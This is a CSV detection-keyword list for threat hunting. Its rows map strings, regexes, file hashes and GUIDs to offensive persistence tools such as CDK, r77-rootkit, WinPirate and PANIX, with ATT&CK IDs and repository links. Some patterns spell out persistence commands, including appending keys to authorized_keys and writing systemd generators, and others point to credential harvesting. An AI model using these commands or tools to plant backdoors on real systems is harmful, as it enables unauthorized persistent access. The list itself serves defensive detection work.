"*b9f0a5f6d8d717f469a530d9796bece42e455e201da01012c717098f0cac53d5*",".{0,1000}b9f0a5f6d8d717f469a530d9796bece42e455e201da01012c717098f0cac53d5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404*",".{0,1000}ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*Backdoor has been set up successfully*",".{0,1000}Backdoor\shas\sbeen\sset\sup\ssuccessfully.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*Backdoor is already removed :)*",".{0,1000}Backdoor\sis\salready\sremoved\s\:\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*Backdoor is already set up ;)*",".{0,1000}Backdoor\sis\salready\sset\sup\s\;\).{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*Backdoor.Linux.Spyssh.J*",".{0,1000}Backdoor\.Linux\.Spyssh\.J.{0,1000}","signature_keyword","sshdoor","Openssh backdoor","T1059.003 - T1105 - T1071.001","TA0011 - TA0003","N/A","FANCY BEAR","Persistence","https://web-assets.esetstatic.com/wls/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf","1","0","#Avsignature","N/A","10","9","N/A","N/A","N/A","N/A"
"*Backdoor.Linux.Sshdkit*",".{0,1000}Backdoor\.Linux\.Sshdkit.{0,1000}","signature_keyword","sshdoor","Openssh backdoor","T1059.003 - T1105 - T1071.001","TA0011 - TA0003","N/A","FANCY BEAR","Persistence","https://web-assets.esetstatic.com/wls/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf","1","0","#Avsignature","N/A","10","9","N/A","N/A","N/A","N/A"
"*Backdoor.MSIL.Sandman*",".{0,1000}Backdoor\.MSIL\.Sandman.{0,1000}","signature_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#Avsignature","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*backdoor.sh -v * -p *",".{0,1000}backdoor\.sh\s\-v\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","#linux","N/A","10","4","320","83","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*bashRCPersistence*",".{0,1000}bashRCPersistence.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","311","38","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z"
"*bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9*",".{0,1000}bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207*",".{0,1000}bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*bc40d2839a4942652d9a765b64a024b600b2dd3b3205f845d77b93d458b039b9*",".{0,1000}bc40d2839a4942652d9a765b64a024b600b2dd3b3205f845d77b93d458b039b9.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*bca1f1c7d9253bafb3442c4dd95a0b18a82be404ab9442a373b2ff91a47f5164*",".{0,1000}bca1f1c7d9253bafb3442c4dd95a0b18a82be404ab9442a373b2ff91a47f5164.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*BCE48DAE-232E-4B3D-B5B5-D0B29BB7E9DE*",".{0,1000}BCE48DAE\-232E\-4B3D\-B5B5\-D0B29BB7E9DE.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe*",".{0,1000}bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*bd4c534c458ff68d34112516e281ba763093dcb9ab531ccc3e6c95b5aef667d8*",".{0,1000}bd4c534c458ff68d34112516e281ba763093dcb9ab531ccc3e6c95b5aef667d8.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*",".{0,1000}BD745A5E\-A1E9\-4FDD\-A15B\-E9F303A625AE.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","#GUIDproject","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*",".{0,1000}bd745a5e\-a1e9\-4fdd\-a15b\-e9f303a625ae.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","#GUIDproject","N/A","10","3","214","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z"
"*beafc9e9d828c755348ee00e6afbcfa79072741353a8509881e13da012a27509*",".{0,1000}beafc9e9d828c755348ee00e6afbcfa79072741353a8509881e13da012a27509.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*Ben0xA/DoUCMe*",".{0,1000}Ben0xA\/DoUCMe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*BetterBackdoor*",".{0,1000}BetterBackdoor.{0,1000}","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - TA0008","N/A","N/A","Persistence","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","N/A","3","278","87","2024-10-03T18:44:04Z","2019-07-29T14:45:24Z"
"*bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41*",".{0,1000}bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*bf436bdcf33e8567d57edad7e673c9bcf6b4eb9a514d95c94a85418e964e4f8d*",".{0,1000}bf436bdcf33e8567d57edad7e673c9bcf6b4eb9a514d95c94a85418e964e4f8d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421*",".{0,1000}bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*BKDR_TERMITE.A*",".{0,1000}BKDR_TERMITE\.A.{0,1000}","signature_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#Avsignature","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*BloodSecurity Hackers Shell*",".{0,1000}BloodSecurity\sHackers\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2393","393","2025-01-28T02:21:47Z","2020-05-13T11:28:52Z"
"*Booty\master_password_list.csv*",".{0,1000}Booty\\master_password_list\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*browsinghistoryview.exe*",".{0,1000}browsinghistoryview\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*BrowsingHistoryView.html*",".{0,1000}BrowsingHistoryView\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*Building ABPTTS configuration *",".{0,1000}Building\sABPTTS\sconfiguration\s.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","731","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z"
"*bytecode77/r77-rootkit*",".{0,1000}bytecode77\/r77\-rootkit.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*c:\123.txt*",".{0,1000}c\:\\123\.txt.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*c:\temp\history.csv*",".{0,1000}c\:\\temp\\history\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*c:\temp\history.html*",".{0,1000}c\:\\temp\\history\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*c:\temp\history.txt*",".{0,1000}c\:\\temp\\history\.txt.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*C:\Users\*\AppData\Roaming\Indexing.*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1399","244","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
"*c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d*",".{0,1000}c02322e9bf5f1a0655cdaf316371f91257b9008d2ee6dde791bac5e8b2e5064d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc*",".{0,1000}c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0*",".{0,1000}c142ea52e700259405c0de3aae652fcbbe9d476ca40aafb4309c60538d03f6a0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c2656885d23a89c0ce5ecb131762889fe7c39ff2cf4a8b6d8db2c9d782fb94bd*",".{0,1000}c2656885d23a89c0ce5ecb131762889fe7c39ff2cf4a8b6d8db2c9d782fb94bd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79*",".{0,1000}c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f*",".{0,1000}c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384*",".{0,1000}c417429bfef774a5aad6d5a745b741f291fc0bd1b48514bfd4fbca9345e43384.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c52ebc7882d730dcd1d32551e8ed3eca5997f56079efb92c591e62292d3c0c09*",".{0,1000}c52ebc7882d730dcd1d32551e8ed3eca5997f56079efb92c591e62292d3c0c09.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c5e6f5bd9b5c828645a7c77f07a4a5973a3904d2a9ae01b2cb0ad2574bf2c8d9*",".{0,1000}c5e6f5bd9b5c828645a7c77f07a4a5973a3904d2a9ae01b2cb0ad2574bf2c8d9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00*",".{0,1000}c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc*",".{0,1000}c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9*",".{0,1000}c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c7fa65795c3627674274f83ccab5776c80922708787a2121ac4d5cfd02551fc4*",".{0,1000}c7fa65795c3627674274f83ccab5776c80922708787a2121ac4d5cfd02551fc4.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9*",".{0,1000}c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c9203ada65ee8c0c96d177343c3ae42592f4486e5ef05bce0dab3108e9935862*",".{0,1000}c9203ada65ee8c0c96d177343c3ae42592f4486e5ef05bce0dab3108e9935862.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*c9bdad45179ca59d8b6b725d329b8ab1ba8e1561c44cc3a14093bfe3c97df3ae*",".{0,1000}c9bdad45179ca59d8b6b725d329b8ab1ba8e1561c44cc3a14093bfe3c97df3ae.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*c9d9c56c1eb6891ede852ccc96dc343afbd5057ab0451bc75ba7095203f0762a*",".{0,1000}c9d9c56c1eb6891ede852ccc96dc343afbd5057ab0451bc75ba7095203f0762a.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#filehash","N/A","10","2","145","15","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z"
"*ca6d09368c87c863029065d8d134bea7edefe73e270b599336185bec60dc68ab*",".{0,1000}ca6d09368c87c863029065d8d134bea7edefe73e270b599336185bec60dc68ab.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cat *.pub >> */authorized_keys*",".{0,1000}cat\s.{0,1000}\.pub\s\>\>\s.{0,1000}\/authorized_keys.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*cat <<-EOF > /usr/lib/systemd/system-generators/generator*",".{0,1000}cat\s\<\<\-EOF\s\>\s\/usr\/lib\/systemd\/system\-generators\/generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7*",".{0,1000}cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963*",".{0,1000}cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
